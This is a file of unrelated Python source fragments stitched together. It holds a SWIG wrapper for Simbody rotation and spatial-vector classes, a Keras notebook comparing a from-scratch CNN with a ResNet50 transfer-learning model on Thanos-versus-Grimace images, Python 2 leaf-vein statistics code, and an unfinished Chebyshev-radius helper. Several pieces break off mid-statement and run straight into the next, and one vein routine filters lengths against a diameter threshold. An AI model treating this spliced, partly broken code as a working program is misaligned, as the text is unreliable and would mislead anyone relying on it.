_simbody.VectorOfSpatialVec___len__(self) __swig_destroy__ = _simbody.delete_VectorOfSpatialVec __del__ = lambda self: None VectorOfSpatialVec_swigregister = _simbody.VectorOfSpatialVec_swigregister VectorOfSpatialVec_swigregister(VectorOfSpatialVec) class MatrixOfSpatialVec(_object): """Proxy of C++ SimTK::Matrix_<(SimTK::SpatialVec)> class.""" __swig_setmethods__ = {} __setattr__ = lambda self, name, value: _swig_setattr(self, MatrixOfSpatialVec, name, value) __swig_getmethods__ = {} __getattr__ = lambda self, name: _swig_getattr(self, MatrixOfSpatialVec, name) __repr__ = _swig_repr def __init__(self, *args): """ __init__(SimTK::Matrix_<(SimTK::SpatialVec)> self) -> MatrixOfSpatialVec __init__(SimTK::Matrix_<(SimTK::SpatialVec)> self, MatrixOfSpatialVec src) -> MatrixOfSpatialVec Parameters ---------- src: SimTK::Matrix_< SimTK::SpatialVec > const & __init__(SimTK::Matrix_<(SimTK::SpatialVec)> self, int m, int n) -> MatrixOfSpatialVec Parameters ---------- m: int n: int __init__(SimTK::Matrix_<(SimTK::SpatialVec)> self, int m, int n, SpatialVec initialValue) -> MatrixOfSpatialVec Parameters ---------- m: int n: int initialValue: SimTK::Vec< 2,SimTK::Vec< 3,double,1 >,1 > const & """ this = _simbody.new_MatrixOfSpatialVec(*args) try: self.this.append(this) except __builtin__.Exception: self.this = this def toString(self): """ toString(MatrixOfSpatialVec self) -> std::string Parameters ---------- self: SimTK::Matrix_< SimTK::SpatialVec > const * """ return _simbody.MatrixOfSpatialVec_toString(self) def get(self, i, j): """ get(MatrixOfSpatialVec self, int i, int j) -> SpatialVec Parameters ---------- i: int j: int """ return _simbody.MatrixOfSpatialVec_get(self, i, j) def set(self, i, j, value): """ set(MatrixOfSpatialVec self, int i, int j, SpatialVec value) Parameters ---------- i: int j: int value: SimTK::Vec< 2,SimTK::Vec< 3,double,1 >,1 > const & """ return _simbody.MatrixOfSpatialVec_set(self, i, j, value) __swig_destroy__ = _simbody.delete_MatrixOfSpatialVec __del__ = lambda self: None 
MatrixOfSpatialVec_swigregister = _simbody.MatrixOfSpatialVec_swigregister MatrixOfSpatialVec_swigregister(MatrixOfSpatialVec) BodyRotationSequence = _simbody.BodyRotationSequence SpaceRotationSequence = _simbody.SpaceRotationSequence class Rotation(Mat33): """Proxy of C++ SimTK::Rotation_<(double)> class.""" __swig_setmethods__ = {} for _s in [Mat33]: __swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {})) __setattr__ = lambda self, name, value: _swig_setattr(self, Rotation, name, value) __swig_getmethods__ = {} for _s in [Mat33]: __swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {})) __getattr__ = lambda self, name: _swig_getattr(self, Rotation, name) __repr__ = _swig_repr def setRotationToIdentityMatrix(self): """ setRotationToIdentityMatrix(Rotation self) -> Rotation Parameters ---------- self: SimTK::Rotation_< double > * """ return _simbody.Rotation_setRotationToIdentityMatrix(self) def setRotationToNaN(self): """ setRotationToNaN(Rotation self) -> Rotation Parameters ---------- self: SimTK::Rotation_< double > * """ return _simbody.Rotation_setRotationToNaN(self) def setRotationFromAngleAboutAxis(self, angle, axis): """ setRotationFromAngleAboutAxis(Rotation self, double angle, CoordinateAxis axis) -> Rotation Parameters ---------- angle: double axis: SimTK::CoordinateAxis const & """ return _simbody.Rotation_setRotationFromAngleAboutAxis(self, angle, axis) def setRotationFromAngleAboutX(self, *args): """ setRotationFromAngleAboutX(Rotation self, double angle) -> Rotation Parameters ---------- angle: double setRotationFromAngleAboutX(Rotation self, double cosAngle, double sinAngle) -> Rotation Parameters ---------- cosAngle: double sinAngle: double """ return _simbody.Rotation_setRotationFromAngleAboutX(self, *args) def setRotationFromAngleAboutY(self, *args): """ setRotationFromAngleAboutY(Rotation self, double angle) -> Rotation Parameters ---------- angle: double setRotationFromAngleAboutY(Rotation self, double cosAngle, double sinAngle) -> Rotation Parameters ---------- cosAngle: double sinAngle: double """ return _simbody.Rotation_setRotationFromAngleAboutY(self, *args) def setRotationFromAngleAboutZ(self, *args): """ setRotationFromAngleAboutZ(Rotation self, double angle) -> Rotation Parameters ---------- angle: double setRotationFromAngleAboutZ(Rotation self, double cosAngle, double sinAngle) -> Rotation Parameters ---------- cosAngle: double sinAngle: double """ return _simbody.Rotation_setRotationFromAngleAboutZ(self, *args) def setRotationFromAngleAboutNonUnitVector(self, angle, nonUnitVector): """ setRotationFromAngleAboutNonUnitVector(Rotation self, double angle, Vec3 nonUnitVector) -> Rotation Parameters ---------- angle: double nonUnitVector: SimTK::Vec3 const & """ return _simbody.Rotation_setRotationFromAngleAboutNonUnitVector(self, angle, nonUnitVector) def setRotationFromTwoAnglesTwoAxes(self, bodyOrSpace, angle1, axis1, angle2, axis2): """ setRotationFromTwoAnglesTwoAxes(Rotation self, SimTK::BodyOrSpaceType bodyOrSpace, double angle1, CoordinateAxis axis1, double angle2, CoordinateAxis axis2) -> Rotation Parameters ---------- bodyOrSpace: enum SimTK::BodyOrSpaceType angle1: double axis1: SimTK::CoordinateAxis const & angle2: double axis2: SimTK::CoordinateAxis const & """ return _simbody.Rotation_setRotationFromTwoAnglesTwoAxes(self, bodyOrSpace, angle1, axis1, angle2, axis2) def setRotationFromThreeAnglesThreeAxes(self, bodyOrSpace, angle1, axis1, angle2, axis2, angle3, axis3): """ setRotationFromThreeAnglesThreeAxes(Rotation self, 
SimTK::BodyOrSpaceType bodyOrSpace, double angle1, CoordinateAxis axis1, double angle2, CoordinateAxis axis2, double angle3, CoordinateAxis axis3) -> Rotation Parameters ---------- bodyOrSpace: enum SimTK::BodyOrSpaceType angle1: double axis1: SimTK::CoordinateAxis const & angle2: double axis2: SimTK::CoordinateAxis const & angle3: double axis3: SimTK::CoordinateAxis const & """ return _simbody.Rotation_setRotationFromThreeAnglesThreeAxes(self, bodyOrSpace, angle1, axis1, angle2, axis2, angle3, axis3) def setRotationToBodyFixedXY(self, v): """ setRotationToBodyFixedXY(Rotation self, Vec2 v) Parameters ---------- v: SimTK::Vec2 const & """ return _simbody.Rotation_setRotationToBodyFixedXY(self, v) def setRotationFromQuaternion(self, q): """ setRotationFromQuaternion(Rotation self, Quaternion q) -> Rotation Parameters ---------- q: SimTK::Quaternion_< double > const & """ return _simbody.Rotation_setRotationFromQuaternion(self, q) def setRotationFromApproximateMat33(self, m): """ setRotationFromApproximateMat33(Rotation self, Mat33 m) -> Rotation Parameters ---------- m: SimTK::Mat33 const & """ return _simbody.Rotation_setRotationFromApproximateMat33(self, m) def setRotationFromOneAxis(self, uvec, axis): """ setRotationFromOneAxis(Rotation self, UnitVec3 uvec, CoordinateAxis axis) -> Rotation Parameters ---------- uvec: SimTK::UnitVec3 const & axis: SimTK::CoordinateAxis const """ return _simbody.Rotation_setRotationFromOneAxis(self, uvec, axis) def setRotationFromTwoAxes(self, uveci, axisi, vecjApprox, axisjApprox): """ setRotationFromTwoAxes(Rotation self, UnitVec3 uveci, CoordinateAxis axisi, Vec3 vecjApprox, CoordinateAxis axisjApprox) -> Rotation Parameters ---------- uveci: SimTK::UnitVec3 const & axisi: SimTK::CoordinateAxis const & vecjApprox: SimTK::Vec3 const & axisjApprox: SimTK::CoordinateAxis const & """ return _simbody.Rotation_setRotationFromTwoAxes(self, uveci, axisi, vecjApprox, axisjApprox) def convertOneAxisRotationToOneAngle(self, axis1): """ convertOneAxisRotationToOneAngle(Rotation self, CoordinateAxis axis1) -> double Parameters ---------- axis1: SimTK::CoordinateAxis const & """ return _simbody.Rotation_convertOneAxisRotationToOneAngle(self, axis1) def convertTwoAxesRotationToTwoAngles(self, bodyOrSpace, axis1, axis2): """ convertTwoAxesRotationToTwoAngles(Rotation self, SimTK::BodyOrSpaceType bodyOrSpace, CoordinateAxis axis1, CoordinateAxis axis2) -> Vec2 Parameters ---------- bodyOrSpace: enum SimTK::BodyOrSpaceType axis1: SimTK::CoordinateAxis const & axis2: SimTK::CoordinateAxis const & """ return _simbody.Rotation_convertTwoAxesRotationToTwoAngles(self, bodyOrSpace, axis1, axis2) def convertThreeAxesRotationToThreeAngles(self, bodyOrSpace, axis1, axis2, axis3): """ convertThreeAxesRotationToThreeAngles(Rotation self, SimTK::BodyOrSpaceType bodyOrSpace, CoordinateAxis axis1, CoordinateAxis axis2, CoordinateAxis axis3) -> Vec3 Parameters ---------- bodyOrSpace: enum SimTK::BodyOrSpaceType axis1: SimTK::CoordinateAxis const & axis2: SimTK::CoordinateAxis const & axis3: SimTK::CoordinateAxis const & """ return
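# Illustrative usage sketch, not part of the generated wrapper above.  The
# import path is an assumption: the SWIG layer shown here is normally exposed
# as a `simbody` Python module living next to the `_simbody` extension (for
# example inside the OpenSim bindings); adjust the import to your build.
def spatial_vec_demo():
    from simbody import SpatialVec, Vec3   # assumed module/class names

    sv = SpatialVec(Vec3(1.0, 0.0, 0.0),   # rotational component
                    Vec3(0.0, 2.0, 0.0))   # translational component
    sv.set(1, Vec3(0.0, 0.0, 3.0))         # overwrite the translational part
    assert len(sv) == 2
    assert sv.isFinite() and not sv.isNaN()
    sv.setToZero()
    return sv.get(0), sv.get(1)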
will use its already trained convolutional layers and # adapt (i.e., train) the classification head. # # ### Load pre-trained network # We will load the ResNet50 model. The first time, this might take a few (~5) minutes. # Afterwards, we will [freeze its convolutional layers](https://github.com/keras-team/keras/issues/4465#issuecomment-311000870) # to make sure we won't change them at all. # %% cnn_resnet50 = ResNet50(include_top=False, # Whether to include the fully-connected layer at the top (or not) weights='imagenet') # Weights were obtained trained on ImageNet. for conv_layer in cnn_resnet50.layers: conv_layer.trainable = False cnn_resnet50.summary() # %% [markdown] # We can see that this model has > 23 M parameters. Notice how _none_ of # them are trainable. It is worth mentioning this model is different # from our CNN from scratch not only in the number of parameters, but # also in its architecture. You can read more about it in the [original paper](http://openaccess.thecvf.com/content_cvpr_2016/papers/He_Deep_Residual_Learning_CVPR_2016_paper.pdf) # # ### Generate classification head # For the sake of comparision, we will use the same classification head as # in the previous case. The code is slightly different, since we need to # fetch the output layer of the pretrained CNN. Then we can start adding # layers. We will use `tf.keras`'s [`GlobalAveragePooling2D`](https://www.tensorflow.org/api_docs/python/tf/keras/layers/GlobalAveragePooling2D) # to average over the spatial locations and convert the features to a # 1D vector (per image). # %% x = cnn_resnet50.output x = layers.GlobalAveragePooling2D()(x) # Global average layer x = layers.Dense(64, activation='relu')(x) # Dense layer x = layers.Dense(32, activation='relu')(x) # Dense layer x = layers.Dense(1, activation='sigmoid')(x) # Prediction (output) layer model_tl = Model(cnn_resnet50.input, x) model_tl.summary() # %% [markdown] # Now we have 133,249 additional parameters that _are_ trainable. These # correspond to the classification head we just added. # # It is always a good sanity check to verify where do these parameters # come from. In our case: # # * $2048 \times 64$ weights from the global to the dense layer # * $64 \times 32$ weights from dense to dense layer # * $32 \times 1$ weights from dense to prediction layer # * $64$, $32$, and $1$ biases from the dense and the prediction layers # %% n_params_tl = (2048*64) + (64*32) + (32*1) + (64+32+1) print("TL trainable parameters = {0:d}".format(n_params_tl)) # %% [markdown] # Looks like we are good! # # ## Compiling our models. # Finally, we will define our models' optimizer, loss function, and metric # and compile the whole thing. We will use the same parameters for both models # (the one we built from scratch and the one we built using transfer learning) # for a fair comparison. # %% optimizer = tf.keras.optimizers.Adam() # Adam = RMSprop + Momentum (https://www.dlology.com/blog/quick-notes-on-how-to-choose-optimizer-in-keras/) loss = 'binary_crossentropy' # Since it is a binary classification (Thanos or Grimace) metrics = ['accuracy'] model_scratch.compile(loss=loss, optimizer=optimizer, metrics=metrics) model_tl.compile(loss=loss, optimizer=optimizer, metrics=metrics) # %% [markdown] # ## Model fitting # Fortunately, Keras makes fitting (i.e., training) a model very easy: # %% [markdown] # # Classification using CNNs # # ## Create data generators # We could manually load the images, pre-process them, and make them ready # for our task. 
However, `tf.keras` has an [ImageDataGenerator class](https://www.tensorflow.org/api_docs/python/tf/keras/preprocessing/image/ImageDataGenerator) # that will save us lots of trouble. # # First, we will create an ImageDataGenerator instance where we will define # the augmentation operations that we want. It is important to mention that # with `tf.keras` we have no control over the order in which the data # augmentation operations will be executed. We will also define the function # that will be implied on each input (`preprocessing_function`). Notice that # this function is model specific. Since we will be using the ResNet-50 model, # we will use its corresponding function (as defined in the preliminaries). # # Afterwards, we will apply the method [`flow_from_directory`](https://www.tensorflow.org/api_docs/python/tf/keras/preprocessing/image/ImageDataGenerator#flow_from_directory), # which will will generate batches of augmented data based on the data located # in the given path. # %% training_datagen = ImageDataGenerator( rotation_range=15, # Rotate images randomly withing this range (+/-). width_shift_range=0.1, # Translate images horizontally randomly within this proportion. height_shift_range=0.1, # Translate images vertically randomly within this proportion. shear_range=5, # Shear intensity (shear angle, [deg]). zoom_range=0.1, # Range for random zoom. vertical_flip=True, horizontal_flip=True, preprocessing_function=preprocess_input ) training_generator = training_datagen.flow_from_directory( directory=PATH_DATA/'training', batch_size=64, # Number of images per batch. Arbitrary. shuffle=True, class_mode='binary', # We have two possible outputs (Thanos or Grimace). target_size=(224, 224) # ResNet-50 requires these dimensions. ) # %% [markdown] # Now, we will create the generator for the validation set. It is pretty # much the same that for the training set, except we won't perform any # data augmentation. # %% validation_datagen = ImageDataGenerator(preprocessing_function=preprocess_input) validation_generator = validation_datagen.flow_from_directory( directory=PATH_DATA/'validation', batch_size=64, shuffle=False, class_mode='binary', target_size=(224, 224) ) # %% [markdown] # For practical reasons, we will generate the model only once. For future # runs of the script, we will load it from memory. Notice that we will need to # change this if we decide to implement something like # cross validation, for instance. # # In the future, I would like to look into [Git Large File Storage](https://git-lfs.github.com/) # for this type of things. # %% n_epochs = 50 model_scratch_name = 'model_scratch_epochs=' + str(n_epochs) + '_vprop={0:.2f}'.format(val_prop) if not (PATH_MODELS/(model_scratch_name + '.h5')).exists(): history_scratch_ = model_scratch.fit_generator( generator=training_generator, epochs=n_epochs, validation_data=validation_generator) model_scratch.save(PATH_MODELS/(model_scratch_name + '.h5')) # Save history. history_scratch = history_scratch_.history pickle.dump(history_scratch, open((PATH_MODELS/('history_' + model_scratch_name + '.p')), "wb" )) else: # Load model. model_scratch = tf.keras.models.load_model((PATH_MODELS/(model_scratch_name + '.h5'))) # Load history. 
history_scratch = pickle.load(open((PATH_MODELS/('history_' + model_scratch_name + '.p')), "rb" )) model_tl_name = 'model_tl_epochs=' + str(n_epochs) + '_vprop={0:.2f}'.format(val_prop) if not (PATH_MODELS/(model_tl_name + '.h5')).exists(): history_tl_ = model_tl.fit_generator( generator=training_generator, epochs=n_epochs, validation_data=validation_generator) model_tl.save(PATH_MODELS/(model_tl_name + '.h5')) # Save history. history_tl = history_tl_.history pickle.dump(history_tl, open((PATH_MODELS/('history_' + model_tl_name + '.p')), "wb" )) else: # Load model. model_tl = tf.keras.models.load_model((PATH_MODELS/(model_tl_name + '.h5'))) # Load history. history_tl = pickle.load(open((PATH_MODELS/('history_' + model_tl_name + '.p')), "rb" )) # %% [markdown] # Remember that training the model is very likely what will take the longest, # specially for a large number of epochs. # # ## Model evaluation # There are several ways to evaluate the performance of the model. # # ### Learning curves # Learning curves can show the evolution of the accuracy through the # epochs. Furthermore, they can also be a [valuable tool for diagnosing # issues in our model.](https://machinelearningmastery.com/learning-curves-for-diagnosing-machine-learning-model-performance/) # We can generate them very easily from the model history. # %% epochs = range(1, n_epochs+1) for model_hist, model_name in zip([history_scratch, history_tl], ['model_scratch', 'model_tl']): fig, ax = plt.subplots(2, 1, figsize=[8, 8]) # Accuracy ax[0].plot(epochs, model_hist['accuracy'], linewidth=3, label="Training accuracy") ax[0].plot(epochs, model_hist['val_accuracy'], linewidth=3, label="Validation accuracy") ax[0].legend(loc=(1.04, 0.75), frameon=False) #ax[0].set_ylim([0, 1]) ax[0].set_ylabel("Accuracy", fontweight='bold') ax[0].set_title(model_name, fontweight='bold') # Loss ax[1].plot(epochs, model_hist['loss'], linewidth=3, label="Training loss") ax[1].plot(epochs, model_hist['val_loss'], linewidth=3, label="Validation loss") ax[1].legend(loc=(1.04, 0.75), frameon=False) #ax[1].set_ylim([0, 1]) ax[1].set_xlabel("Epoch", fontweight='bold') ax[1].set_ylabel("Loss", fontweight='bold') fig.savefig(PATH_RESULTS/(model_name + '_epochs=' + str(n_epochs) + '_vprop={0:.2f}'.format(val_prop) + '.pdf'), bbox_inches='tight', dpi=150) # %% [markdown] # We can clearly see that the TL model performs way better than the one # we developed from scratch (actually, the behaviour of the from-scratch model # is a bit weird - I will investigate that in the future). Thus, we will use # the former for the rest of this notebook. # # ### Show predictions # We can actually feed any image to the model and see what probabilities it # yields (and therefore its predictions). In this case, we will take a look # at a random sample of the validation images. You can run the following cell # several times to take a new set of images. # %% images_validation_path = list() for item in (PATH_DATA/'validation').glob('**/*'): if not item.is_dir(): images_validation_path.append(item) n_images_validation = 3 images_validation_path = random.sample(images_validation_path, n_images_validation) images_validation = [Image.open(image_validation_path) for image_validation_path in images_validation_path] # Remember to preprocess the input! 
image_batch = list() image_batch = np.stack([preprocess_input(np.array(image_validation.resize((224, 224)))) for image_validation in images_validation]) prediction_probabilities = model_tl.predict(image_batch) fig, axes = plt.subplots(1, n_images_validation, figsize=(15, 5)) for ii, image in enumerate(images_validation): axes[ii].imshow(image) axes[ii].set_title("Thanos {:.1f}%, Grimace {:.1f}%".format(100*prediction_probabilities[ii,0], 100*(1-prediction_probabilities[ii,0]))) axes[ii].axis('off') # %% [markdown] # ### Bonus: Grimos # Lastly, I want to try the model with images that I consider specially # tricky: Grimos. See the [README file](../README.md) for more about him. # %% images_grimos_path = list() for item in (PATH_DATA/'images'/'_grimos').glob('**/*'): if not item.is_dir(): images_grimos_path.append(item) n_images_grimos = 3 images_grimos_path = random.sample(images_grimos_path, n_images_validation) images_grimos = [Image.open(image_grimos_path) for image_grimos_path in images_grimos_path] # Remember to preprocess the input! image_batch = list() image_batch = np.stack([preprocess_input(np.array(image_grimos.resize((224, 224)))) for image_grimos in images_grimos]) prediction_probabilities = model_tl.predict(image_batch) fig, axes = plt.subplots(1, n_images_grimos, figsize=(15, 5)) for ii, image in enumerate(images_grimos): axes[ii].imshow(image) axes[ii].set_title("Thanos {:.1f}%, Grimace {:.1f}%".format(100*prediction_probabilities[ii,0], 100*(1-prediction_probabilities[ii,0]))) axes[ii].axis('off') # %% [markdown] # Surprisingly, the model predicts that Grimos is
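# %% [markdown]
# ### Aggregate validation metrics (added sketch)
# This cell is an illustrative addition, not part of the original notebook.
# Besides inspecting individual predictions, we can ask Keras for the overall
# loss and accuracy over the validation generator. `evaluate_generator` matches
# the `fit_generator`-era API used above; on newer versions of `tf.keras`,
# `model_tl.evaluate(validation_generator)` is the equivalent call.

# %%
val_loss_tl, val_acc_tl = model_tl.evaluate_generator(validation_generator)
print("Transfer-learning model: validation loss = {0:.3f}, accuracy = {1:.3f}".format(val_loss_tl, val_acc_tl))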
edge, reverse=False): if reverse: return self.follow_highest_width_path(G, (edge[1], edge[0])) u, v = edge visited = set([u]) path = [u] path_edges = [(u, v)] while True: path.append(v) visited.add(v) a, b = path_edges[-1] cur_width = G[a][b]['conductivity'] nexts = sorted([(G[v][n]['conductivity'], n) for n in G.neighbors_iter(v) if not n in visited and G[v][n]['conductivity'] < cur_width]) if len(nexts) > 0: v = nexts[-1][1] path_edges.append((path[-1], v)) else: break return path, path_edges def smoothen_path(self, verts, reps=50): for i in xrange(reps): avgs = 0.25*(verts[:-2] + 2*verts[1:-1] + verts[2:]) verts[1:-1] = avgs def fit_ellipse_to_points(self, x, y): """ Fit an ellipse to the given point set, return semimajor and semiminor axes """ aa = fit_ellipse(x, y) a, b = ellipse_axis_length(aa) x0, y0 = ellipse_center(aa) phi = ellipse_angle_of_rotation(aa) return a, b, x0, y0, phi def main_vein_length_by_ellipse(self, show_plot=True): # estimate main vein length by fitting an ellipse to the # leaf margin and using twice the semimajor axis as length # estimate cy = self.marked_tree.node[self.marked_tree.graph['root']]['cycle'] a, b, x0, y0, phi = \ self.fit_ellipse_to_points(cy.coords[:,0], cy.coords[:,1]) print "Fitted ellipse axes: {}, {}".format(2*a, 2*b) if show_plot: plt.figure() plot.draw_leaf(self.lowres_graph) plt.scatter(cy.coords[:,0], cy.coords[:,1]) phis = arange(0, 2*pi, 0.01) xx = x0 + a*cos(phis)*cos(phi) - b*sin(phis)*sin(phi) yy = y0 + a*cos(phis)*sin(phi) + b*sin(phis)*cos(phi) plt.plot(xx, yy) plt.show() return 2*max(a, b) def main_vein_length_by_largest_pdist(self): # Calculate largest distance between any two points # on the leaf margin cy = self.marked_tree.node[self.marked_tree.graph['root']]['cycle'] length = max(pdist(cy.coords)) print "Largest distance between any two points on margin:", length return length def main_vein_length(self, G, show_plot=True): # Use only largest connected component, assuming it contains # the leaf G = G.subgraph(sorted_connected_components_copy(G)[0]) # Now that this is fixed, onto the actual main veins veins = sorted([(d['conductivity'], d['weight'], sqrt((G.node[u]['x'] - G.node[v]['x'])**2 + (G.node[u]['y'] - G.node[v]['y'])**2), (u, v)) for u, v, d in G.edges_iter(data=True)]) lengths = [l for d, l, r, e in veins] geom_lengths = [r for d, l, r, e in veins] print "Fixing main vein length..." len_ellipse = self.main_vein_length_by_ellipse(show_plot=show_plot) len_pdist = self.main_vein_length_by_largest_pdist() # Sophisticated fix necessary. # Idea: find longest paths of highest width elements # and straighten them out. major_nodes = array([e for d, l, r, e in veins]).flatten() # We must not allow loops. This modified version of # MST finds a spanning tree including the largest edges, # so we always get the main vein G_major = minimum_spanning_tree(G.subgraph(major_nodes), weight='conductivity') highest_edge = veins[-1][3] # Detect main vein. 
p1, pe1 = self.follow_highest_width_path(G_major, highest_edge) p2, pe2 = self.follow_highest_width_path(G_major, highest_edge, reverse=True) # Find coordinates and smoothen them out main_vein_path = p2[::-1] + p1[2:] main_vein_coords = array([[G.node[n]['x'], G.node[n]['y']] for n in main_vein_path]) self.smoothen_path(main_vein_coords) # Calculate length and save dx = diff(main_vein_coords, axis=0) lens = sqrt((dx**2).sum(-1)[...,newaxis]) length = sum(lens) print "Main vein length (smoothened):", length diams = array([G[u][v]['conductivity'] for u, v in pe1] + \ [G[u][v]['conductivity'] for u, v in pe2[1:]]) if show_plot: plt.figure() plot.draw_leaf(self.lowres_graph) plot.draw_leaf(self.leaf, edge_list=pe1, color='r') plot.draw_leaf(self.leaf, edge_list=pe2, color='g') plt.show() # fix vein lengths #print main_vein_path for (u, v), fl in izip(pairwise(main_vein_path), lens): G[u][v]['weight'] = fl return lens, diams, len_ellipse, len_pdist def vein_stats(self, G): """ Returns vein statistics of graph G. Parameters: G: A networkx graph with edge attributes 'conductivity' and 'weight' Returns: veins: (conductivity, weight) pairs minor_vein_thresh: Threshold width for minor veins minor_vein_diameters minor_vein_lengths """ # Vein statistics veins = np.array([[d['conductivity'], d['weight']] for u, v, d in G.edges_iter(data=True)]) lengths = [l for d, l in veins] diameters = [d for d, l in veins] # minor veins - lower 95% of vein diameters minor_vein_thresh = percentile(diameters, q=95) minor_vein_lengths = [l for l in lengths if l > minor_vein_thresh] minor_vein_diameters = [d['conductivity'] for u, v, d in G.edges_iter(data=True) if d['conductivity'] < minor_vein_thresh] return veins, minor_vein_thresh, minor_vein_diameters, \ minor_vein_lengths def calculate_vein_distances(self): """ approximate vein distances by fitting ellipses to the areoles, and taking the semiminor axis as an estimate for the incircle radius """ distances = [] for n, d in self.marked_tree_no_ext.degree_iter(): if d == 1: coords = self.marked_tree_no_ext.node[n]['cycle'].coords a, b, x0, y0, phi = self.fit_ellipse_to_points( coords[:,0], coords[:,1]) distances.append(min(a, b)) distances = real(array(distances)) distances = distances[logical_not(isnan(distances))] return distances def calculate_vein_distances_chebyshev(self): """ approximate vein distances by finding the chebyshev centers of the areoles, and taking the radii. 
""" distances = [] cvx.solvers.options['show_progress'] = False for n, d in self.marked_tree_no_ext.degree_iter(): if d == 1: coords = self.marked_tree_no_ext.node[n]['cycle'].coords # find convex hull to make approximation # possible hull = ConvexHull(coords) coords = coords[hull.vertices,:] # shift to zero center of gravity cog = coords.mean(axis=0) coords -= cog # append last one coords = vstack((coords, coords[0,:])) # Find Chebyshev center X = cvx.matrix(coords) m = X.size[0] - 1 # Inequality description G*x <= h with h = 1 G, h = cvx.matrix(0.0, (m,2)), cvx.matrix(0.0, (m,1)) G = (X[:m,:] - X[1:,:]) * cvx.matrix([0., -1., 1., 0.], (2,2)) h = (G * X.T)[::m+1] G = cvx.mul(h[:,[0,0]]**-1, G) h = cvx.matrix(1.0, (m,1)) # Chebyshev center R = variable() xc = variable(2) lp = op(-R, [ G[k,:]*xc + R*cvx.blas.nrm2(G[k,:]) <= h[k] for k in xrange(m) ] +[ R >= 0] ) lp.solve() R = R.value xc = xc.value #plt.figure(facecolor='w') ## polyhedron #for k in range(m): # edge = X[[k,k+1],:] + 0.1 * cvx.matrix([1., 0., 0., -1.], (2,2)) * \ # (X[2*[k],:] - X[2*[k+1],:]) # plt.plot(edge[:,0], edge[:,1], 'k') ## 1000 points on the unit circle #nopts = 1000 #angles = cvx.matrix( [ a*2.0*pi/nopts for a in range(nopts) ], (1,nopts) ) #circle = cvx.matrix(0.0, (2,nopts)) #circle[0,:], circle[1,:] = R*cvx.cos(angles), R*cvx.sin(angles) #circle += xc[:,nopts*[0]] ## plot maximum inscribed disk #plt.fill(circle[0,:].T, circle[1,:].T, facecolor = '#F0F0F0') #plt.plot([xc[0]], [xc[1]], 'ko') #plt.title('Chebyshev center (fig 8.5)') #plt.axis('equal') #plt.axis('off') #plt.show() if lp.status == 'optimal': distances.append(R[0]) return array(distances) def width_degree_distribution(self, show_plot=True): """ Calculate the vein width as a function of degree """ widths_radii = [] for n, d in self.marked_tree.nodes_iter(data=True): if d['cycle'] != None: rads = d['cycle'].radii() deg = d['subtree-degree'] #w_r = [[deg, r] for r in rads] #widths_radii.extend(w_r) widths_radii.append([deg, rads.mean()]) widths_radii = array(widths_radii) if show_plot: plt.figure() plt.scatter(widths_radii[:,0], widths_radii[:,1]) plt.xlabel('subtree degree') plt.ylabel('mean vein radii') plt.show() def calculate_statistics(self, show_plot=True, interactive=True): """ Calculates vein statistics for the given leaf. """ # widths-degrees self.width_degree_distribution(show_plot=show_plot) # Fix main vein lengths. 
main_lens, main_diams, main_len_ellipse, main_len_pdist = \ self.main_vein_length(self.leaf, show_plot=show_plot) veins, minor_vein_thresh, minor_vein_diameters, \ minor_vein_lengths = self.vein_stats(self.fixed_leaf) # largest loop (outer loop) leaf_area = self.marked_tree.node[self.marked_tree.graph['root']]['cycle_area'] # leaf area #points = np.array([(d['x'], d['y']) # for n, d in self.fixed_leaf.nodes_iter(data=True)]) #ch = ConvexHull(points) # #pts_closed = np.array(list(points[ch.vertices,:]) + # list([points[ch.vertices[0],:]])) #leaf_area = polygon_area(pts_closed) minor_vein_density = sum(minor_vein_lengths)/leaf_area minor_vein_diameter = mean(minor_vein_diameters) minor_vein_diameter_std = std(minor_vein_diameters) lengths = array([l for d, l in veins]) diameters = array([d for d, l in veins]) print "Minor vein diameter threshold:", minor_vein_thresh print "Minor vein density: {} 1/px".format(minor_vein_density) print "Minor vein diameter: {} +- {} px".format(minor_vein_diameter, minor_vein_diameter_std) print "Total vein density:", veins[:,1].sum()/leaf_area areole_areas = [] for n, d in self.marked_tree_no_ext.degree_iter(): if d == 1: areole_areas.append( self.marked_tree_no_ext.node[n]['cycle_area']) num_areoles = len(areole_areas) print "Number of areoles:", num_areoles vein_distances = self.calculate_vein_distances_chebyshev() print "# Vein distances:", len(vein_distances) print "Avg. vein distance:", vein_distances.mean() if show_plot: # Vein statistics plt.figure() plt.title("Vein diameters") plt.xlabel("Vein diameter (px)") plt.ylabel("Number of veins") plt.hist(diameters, bins=50) plt.axvline(x=mean(diameters), color='r', linewidth=2) plt.axvline(x=median(diameters), color='g', linewidth=2) plt.figure() plt.title("Weighted vein diameters") plt.xlabel("diameter $\\times$ length") plt.hist(diameters*lengths, bins=50) plt.figure() plt.title("Areole areas") plt.xlabel("areole area ($\mathrm{px}^2$)") plt.hist(areole_areas, bins=50) plt.axvline(x=mean(areole_areas), color='r', linewidth=2) plt.axvline(x=median(areole_areas), color='g', linewidth=2) plt.figure() plt.title("Vein lengths") plt.xlabel("Vein length (px)") plt.ylabel("Number of veins") plt.hist(lengths, bins=50) plt.axvline(x=mean(lengths), color='r', linewidth=2) plt.axvline(x=median(lengths), color='g', linewidth=2) plt.figure() plt.title("Vein distances") plt.xlabel("Vein distance (px)") plt.ylabel("Number of areoles") plt.hist(vein_distances, bins=50) plt.axvline(x=mean(vein_distances), color='r', linewidth=2) plt.axvline(x=median(vein_distances), color='g', linewidth=2) plt.show() # Save statistics # Make sure stats directory exists if not os.path.exists(self.stats_dir): os.makedirs(self.stats_dir) # Save stuff savetxt(self.stats_dir + 'leaf_area.txt', array([leaf_area])) savetxt(self.stats_dir + 'minor_vein_threshold.txt', array([minor_vein_thresh])) savetxt(self.stats_dir + 'minor_vein_diameters.txt', array(minor_vein_diameters)) savetxt(self.stats_dir + 'minor_vein_lengths.txt', array(minor_vein_lengths)) savetxt(self.stats_dir + 'vein_diameters_lengths.txt', array(veins)) savetxt(self.stats_dir + 'number_areoles.txt', array([num_areoles])) savetxt(self.stats_dir + 'areole_areas.txt', array(areole_areas)) savetxt(self.stats_dir + 'vein_distances.txt', vein_distances)
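# Hedged sketch (not a method of the original class): the same "largest
# inscribed circle" idea used in calculate_vein_distances_chebyshev(), but
# solved with scipy.optimize.linprog instead of cvxopt.  For a convex polygon
# with facet inequalities A x <= b, the Chebyshev center xc and radius R solve
# maximise R  subject to  A xc + ||A_i|| R <= b,  R >= 0.
import numpy as np
from scipy.optimize import linprog
from scipy.spatial import ConvexHull

def chebyshev_radius(points):
    """Radius of the largest circle inscribed in the convex hull of `points`."""
    hull = ConvexHull(points)
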